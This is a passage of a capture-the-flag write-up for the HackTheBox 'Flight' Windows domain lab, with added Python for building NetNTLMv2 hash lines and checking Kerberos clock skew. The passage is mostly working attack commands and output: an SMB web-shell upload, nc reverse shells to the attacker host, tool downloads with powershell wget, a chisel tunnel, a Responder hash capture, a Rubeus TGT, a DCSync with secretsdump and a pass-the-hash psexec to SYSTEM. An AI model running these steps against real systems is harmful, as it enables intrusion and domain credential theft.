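SAMPLE_BLOB = bytes.fromhex(
    "0101000000000000"                   # blob version 1.1 + reserved
    "0050f30e4e5adb01"                   # timestamp (FILETIME)
    "a1b2c3d4e5f60718"                   # client challenge
    "00000000"                           # reserved
    "02000c0046004c004900470048005400"   # AV pair: NetBIOS domain "FLIGHT"
    "0000000000000000")                  # AV EOL + padding
SAMPLE_LINE = build_5600("svc_apache", "flight", "S@Ss!K@*t13", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("password matches:", verify_5600(SAMPLE_LINE, "S@Ss!K@*t13"))
```

Because the user name and domain act as the only salt, and each guess costs two MD5 HMACs plus one MD4, a NetNTLMv2 response offers no real resistance to a wordlist attack; the effective mitigations are SMB signing plus blocking outbound SMB and LLMNR/NBT-NS so the response is never sent to an attacker in the first place.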
2.7.1. WinRM access fails
I checked whether this account could log in over WinRM, but it failed.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc winrm 10.129.228.120 -u c.bum -p Tikkycoll_431012284
WINRM 10.129.228.120 5985 G0 [*] Windows 10 / Server 2019 Build 17763 (name:G0) (domain:flight.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.228.120 5985 G0 [-] flight.htb\c.bum:Tikkycoll_431012284
3. Getting Inside
3.1. Checking SMB shares with the c.bum account
The shares can be enumerated with the c.bum account as well. Unlike before, the Web share now has WRITE permission too, so that is where I go next.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nxc smb 10.129.228.120 -u c.bum -p Tikkycoll_431012284 --shares
SMB 10.129.228.120 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.129.228.120 445 G0 [+] flight.htb\c.bum:Tikkycoll_431012284
SMB 10.129.228.120 445 G0 [*] Enumerated shares
SMB 10.129.228.120 445 G0 Share Permissions Remark
SMB 10.129.228.120 445 G0 ----- ----------- ------
SMB 10.129.228.120 445 G0 ADMIN$ Remote Admin
SMB 10.129.228.120 445 G0 C$ Default share
SMB 10.129.228.120 445 G0 IPC$ READ Remote IPC
SMB 10.129.228.120 445 G0 NETLOGON READ Logon server share
SMB 10.129.228.120 445 G0 Shared READ,WRITE
SMB 10.129.228.120 445 G0 SYSVOL READ Logon server share
SMB 10.129.228.120 445 G0 Users READ
SMB 10.129.228.120 445 G0 Web READ,WRITE
3.2. Accessing the Web share and uploading a web shell
Opening the Web share shows the two directories flight.htb and school.flight.htb, which tells us that this is the web root.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# smbclient //10.129.43.56/Web -U C.Bum%'Tikkycoll_431012284'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Dec 22 20:37:00 2025
.. D 0 Mon Dec 22 20:37:00 2025
flight.htb D 0 Mon Dec 22 20:37:00 2025
school.flight.htb D 0 Mon Dec 22 20:37:01 2025
5056511 blocks of size 4096. 1246824 blocks available
I went into the styles folder and uploaded the web shell there, because a file created directly under school.flight.htb was deleted automatically and did not work. I also uploaded the nc binary needed to establish the reverse shell.
smb: \school.flight.htb\styles\> put shell.php
putting file shell.php as \school.flight.htb\styles\shell.php (0.1 kb/s) (average 0.1 kb/s)
smb: \school.flight.htb\styles\> put nc.exe
putting file nc.exe as \school.flight.htb\styles\nc.exe (62.0 kb/s) (average 38.8 kb/s)
If the web shell was uploaded correctly, running whoami through it shows which account we are running as, as in the screenshot below.

3.3. Reverse shell
Using the nc binary uploaded earlier, I connect a shell back to port 443.

With Kali listening on port 443, the shell connects back as expected.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.228.120] 62843
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs\school.flight.htb\styles>whoami
whoami
flight\svc_apache
C:\xampp\htdocs\school.flight.htb\styles>
3.4. Getting a shell as c.bum
Even with a shell as svc_apache, the account has few privileges, so getting the flag or doing much else is difficult. Therefore I switch to c.bum, whose credentials are already known.
The tool used for this is RunasCs, which runs a command as another user. I use it to establish a new reverse shell as c.bum.
C:\ProgramData>powershell -c wget 10.10.14.143/RunasCs.exe -outfile r.exe
powershell -c wget 10.10.14.143/RunasCs.exe -outfile r.exe
C:\ProgramData>.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.143:443 cmd
.\r.exe C.Bum Tikkycoll_431012284 -r 10.10.14.143:443 cmd
[-] RunasCsException: WSAConnect failed with error code: 10061
With Kali listening on port 443 again, the shell connects this time. Because the reverse shell was started with c.bum's credentials, whoami now returns c.bum, and the user.txt flag can be read from here.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.228.120] 52620
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
C:\>cd Users\C.Bum\Desktop
cd Users\C.Bum\Desktop
C:\Users\C.Bum\Desktop>type user.txt
type user.txt
4. Lateral Movement
4.1. Checking listening ports
Once inside there was nothing obvious to do, so I checked which services are listening on which ports. Port 8000 stands out: it is commonly used during development and has no fixed purpose, so it is worth checking.
C:\>netstat -ano | findstr LISTENING
netstat -ano | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4832
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 4832
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING 924
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4
[...SNIP...]
4.2. Pivoting & Tunneling
Port 8000 cannot be reached directly from outside, so I use pivoting to bring the internal service out.
For this I use chisel. Kali runs the server and waits for the connection on port 8000.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# ./chisel_1.11.3_linux_arm64 server -p 8000 --reverse
2025/12/22 13:28:21 server: Reverse tunnelling enabled
2025/12/22 13:28:21 server: Fingerprint b0Twrsw/gLWr2mNX4vpCIUcp70wZiGmPVzwn+WprnYc=
2025/12/22 13:28:21 server: Listening on http://0.0.0.0:8000
Next, the client on the target connects to Kali in reverse tunnel mode, and a message confirms that the connection was made.
C:\ProgramData>.\c client 10.10.14.143:8000 R:8001:127.0.0.1:8000
.\c client 10.10.14.143:8000 R:8001:127.0.0.1:8000
2025/12/22 08:35:31 client: Connecting to ws://10.10.14.143:8000
2025/12/22 08:35:33 client: Connected (Latency 188.9217ms)
Once connected, the internal service is reachable from Kali at 127.0.0.1:8001, as in the screenshot below.

4.3. Creating a file on the internal site
I create an arbitrary file. Here inetpub is the default folder of Microsoft IIS, i.e. the folder from which the web service is served, and the development folder inside it turned out to be the one actually being served. So I created a test.txt there and checked whether it could be reached.
C:\inetpub\development>echo "test" > test.txt
echo "test" > test.txt
The file was reachable, as shown below.

4.4. Uploading a web shell
Next I upload a ready-made web shell here. Privilege escalation is hard as c.bum, so I will take over another account. I use cmd.aspx for this; since uploading directly is difficult, I first upload the web shell through smbclient and then copy it into the current folder.
C:\inetpub\development>copy \xampp\htdocs\cmd.aspx .
copy \xampp\htdocs\cmd.aspx .
1 file(s) copied.
C:\inetpub\development>
If the upload worked, it looks like the following. I first run net user to confirm that the shell works.

4.5. Reverse shell connection
So I use the nc binary again to connect a reverse shell back to my Kali.

Connecting through the pivoted server yields a shell with the privileges of the defaultapppool account.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.143] from (UNKNOWN) [10.129.43.56] 49937
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
5. Privilege Escalation
5.1.
The point to pay attention to here is that defaultapppool is a Microsoft virtual account. One of its characteristics is that when it authenticates over the network, it does so with the credentials of the server's machine account.
So I run Responder on my Kali and try to connect to an arbitrary share on it from the target.
c:\windows\system32\inetsrv>net use \\10.10.14.143\anything
net use \\10.10.14.143\anything
Enter the user name for '10.10.14.143': System error 1223 has occurred.
The operation was canceled by the user.
Responder then shows the hash below, and the G0 part stands out: the most plausible conclusion is that this is the computer (machine) name. Since this shell already carries the machine account's network identity, the next step is Rubeus tgtdeleg, which obtains a Kerberos TGT for G0$ from that context; the ticket is converted to ccache format on Kali and, because a domain controller's machine account is allowed to replicate directory data, used with secretsdump.
[!] Error starting TCP server on port 80, check permissions or other servers running.
[SMB] NTLMv2-SSP Client : 10.129.43.56
[SMB] NTLMv2-SSP Username : flight\G0$
[SMB] NTLMv2-SSP Hash : G0$::flight:894fb6b4c4c0039a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
C:\ProgramData>powershell wget 10.10.14.143/Rubeus.exe -outfile rubeus.exe
powershell wget 10.10.14.143/Rubeus.exe -outfile rubeus.exe
C:\ProgramData>.\rubeus.exe tgtdeleg /nowrap
.\rubeus.exe tgtdeleg /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Request Fake Delegation TGT (current user)
[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation request success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: VBZDRTG8ihJ89ssfs3FEWLeAXLnOQPqhC5HjWccrHyU=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):
doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECoCocVPpcBgl1wtS1/537YgYVrwDqlh3J1ad7UQGlmT5Pvm/N8FzEAzz0QzNjam3xLJJM+XMn7BA410lobkQwRWATBFu4oD0dBDN2OTE+QP8aP1/eTm0SgMXY/NvJz4OdJfRzZHetg1BcJMDENmjBPQr1OiwfviKH7Q4ILqWcgQAmhQaGMLNYGhw9Lg406LbXwafOMf+7VKhGvaOHMUBjfO+cRVOuwIlNAfZoC1D2Xy+uN10/UthZv1sCRg2a0ujI0bmBhOZsEdgFhAD0tmLD8ut7Rh+S1byZZ3VlgixU+Ak5ZW1u6P1GX9LcwrsgMAnmuwBIEOmFSPVMuyRWkCAMxwZtYFnaHCgDSaz9zyrRqFjRVwYDlq2CC0Th9/vuPYy2uiYfzi3u5Yqr2yk8GsNkltwPGfHZ8kM5zl0MXbER2PomALkJGLe5z5XnBjAhTYK5zzRQ0OKqcbHwHGG0iDAEoh2Q/AIfOfWhRf9cl2NocukyG9qNuBO9ZvWguUKLsGrNMxXt5JqNnzoALa8nfXPxNSFfuhmwa18FmV7RZPpZc+ljXbCyNpr29FcFMmagR5CNFfhrW1A9uHPEt6WRweecDhmnyZktIfULuUno/I4AwjmP4xhC2kZUH1j9V6EpvkIWLutBLk+vhH9+CdUz8+g9q8RH38qjVu3NUEuQ9yhu+JMdBINgxM6TM5lMwHQo/HB9nKa9J989O7IykaA1P9I9l59n6tX9lszdagtq3O/RG4XZTOMMBwZHQX48Aqhwu7Xbm+adid/dF9/zg92LB/JMyf6JzITsWiI9WDQac+cAvA/vKxY3nzCCwG3Q1VxCiNHZIzn7HWbOAxlHy2d33BP2OiUpUrdY6h1G07UhoZmW1iwhChVb6bBhI/CBHoToTavy6XgA0+SjBEXoKmhngddpVMpbs1KPviADZcrPlEpj+hNWUHs80X2pY9Xtheq6qwCHXl0Gv91WJbEwtWcTmAYBzWuQVABLi0rjXGCc68piYy11JMyq7I4DIMdL4wCxx53I1SVQM4pShCUrI7UqHdfGlQZQmfvkiCcJ+riG8bqN41ek2+TvESHH0OV9r6lXScMVRYgIZXDSjzKD0qfVtgCWGn+CjN7Xl4Nyy4ThL4Y1/f97B9eJLlT+y/tenoMl9FrEYFzR2BKN2sIujnD1X4V7Z9EyJFanlu2NSmkBRhIdtWlIeIvxOZ0V7c25ut6C2ZirId/ArMxrPJlxRxENrK5wPh26txLbyPirWJIuIyIerJ77wpzTAcaEKyZDIfW3aOop1KmaiDBd16y5Rv6VRH6hITNZyZF4ORdufvqvUX8cADegstLJdKUBgwLGd9e//ELURK0JzAxKYbAWGxmofMBdVSxbhHJtiFKzr0No4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQg1k54i71UyzKUa3VT2a9r6ZftFc0XJuF/aJ1WQXP4jxWhDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI1MTIyMjE2NDI1MFqmERgPMjAyNTEyMjMwMjQyNTBapxEYDzIwMjUxMjI5MTY0MjUwWqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# echo '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' > ticket.kirbi
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# cat ticket.kirbi | base64 -d > ticket_binary.kirbi
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# impacket-ticketConverter ticket_binary.kirbi ticket.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# export KRB5CCNAME=ticket.ccache
Clock synchronization: nmap reported a 7-hour clock skew in 1.1, and Kerberos rejects tickets whose timestamps are more than a few minutes off (5 minutes by default), so Kali's clock is aligned with the DC before the ticket is used.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# curl -I flight.htb
HTTP/1.1 200 OK
Date: Mon, 22 Dec 2025 16:49:05 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
Last-Modified: Thu, 24 Feb 2022 05:58:10 GMT
ETag: "1b9d-5d8bd444f0080"
Accept-Ranges: bytes
Content-Length: 7069
Content-Type: text/html
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# sudo timedatectl set-ntp off
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# sudo ntpdate g0.flight.htb
2025-12-22 20:50:22.241757 (+0400) +25199.886389 +/- 0.093053 g0.flight.htb 10.129.43.56 s1 no-leap
CLOCK: time stepped by 25199.886389
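The clock step above is required because Kerberos refuses tickets when the client and KDC clocks differ by more than the configured tolerance (5 minutes by default). The following Python is an added example, not from the write-up: it computes the skew from an HTTP Date header (what the curl -I step returns) and from nmap's clock-skew string, and checks the result against the Kerberos tolerance. The sample Date header is the one in the write-up; the local timestamp is constructed to reproduce the seven-hour gap that was observed.

```python
"""Measure the clock skew between this host and a domain controller before using
Kerberos. Two sources are handled: the Date header of an HTTP response and the
clock-skew string nmap prints (e.g. '7h00m00s'). No network access is needed
for the sample values; measure_skew() performs a live check when called."""
import http.client
import re
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

KERBEROS_TOLERANCE = timedelta(minutes=5)   # KDC default clock tolerance
_NMAP_SKEW = re.compile(r"^(-?)(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")


def skew_from_http_date(date_header: str, local_now: datetime) -> timedelta:
    """Remote minus local; positive means the remote clock is ahead of ours."""
    if local_now.tzinfo is None:
        raise ValueError("local_now must be timezone-aware")
    remote = parsedate_to_datetime(date_header)   # RFC 7231 Date -> aware datetime
    return remote - local_now


def parse_nmap_skew(text: str) -> timedelta:
    """Parse nmap's clock-skew value such as '7h00m00s', '-1s' or '59m59s'."""
    text = text.strip()
    m = _NMAP_SKEW.match(text)
    if not m or text in ("", "-"):
        raise ValueError(f"unrecognised skew: {text!r}")
    sign = -1 if m.group(1) else 1
    hours, minutes, seconds = (int(g or 0) for g in m.groups()[1:])
    return sign * timedelta(hours=hours, minutes=minutes, seconds=seconds)


def kerberos_ok(skew: timedelta, tolerance: timedelta = KERBEROS_TOLERANCE) -> bool:
    """True when the skew is within what the KDC will accept."""
    return abs(skew) <= tolerance


def measure_skew(host: str, port: int = 80, timeout: float = 5.0) -> timedelta:
    """Live check: send HEAD / and compare the Date header with the local clock.
    Resolution is one second, which is more than enough for this purpose."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("HEAD", "/", headers={"Host": host})
        date = conn.getresponse().getheader("Date")
    finally:
        conn.close()
    if not date:
        raise RuntimeError("no Date header in response")
    return skew_from_http_date(date, datetime.now(timezone.utc))


# Date header from the write-up; local time constructed as UTC+4 to reproduce
# the seven-hour gap (the Kali clock read 09:49 UTC while the DC said 16:49 UTC).
SAMPLE_DATE = "Mon, 22 Dec 2025 16:49:05 GMT"
SAMPLE_LOCAL = datetime(2025, 12, 22, 13, 49, 5, tzinfo=timezone(timedelta(hours=4)))

if __name__ == "__main__":
    skew = skew_from_http_date(SAMPLE_DATE, SAMPLE_LOCAL)
    print(f"skew vs DC: {skew}  kerberos usable: {kerberos_ok(skew)}")
    print(f"nmap reported: {parse_nmap_skew('7h00m00s')}")
```

When the check fails, the fix is what the write-up does: stop automatic time synchronisation and step the local clock to the DC (`timedatectl set-ntp off`, then `ntpdate <dc>`); after the engagement, turning NTP back on restores the host's own time.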
Extracting the Administrator NTLM hash with secretsdump. With the G0$ ticket in KRB5CCNAME, secretsdump uses DRSUAPI (DCSync) to pull only the Administrator secrets.
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...
┌──(root㉿kali)-[/home/kali/labs/Flight/Flight-2]
└─# impacket-psexec administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file royYITVY.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service Snxb on flight.htb.....
[*] Starting service Snxb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system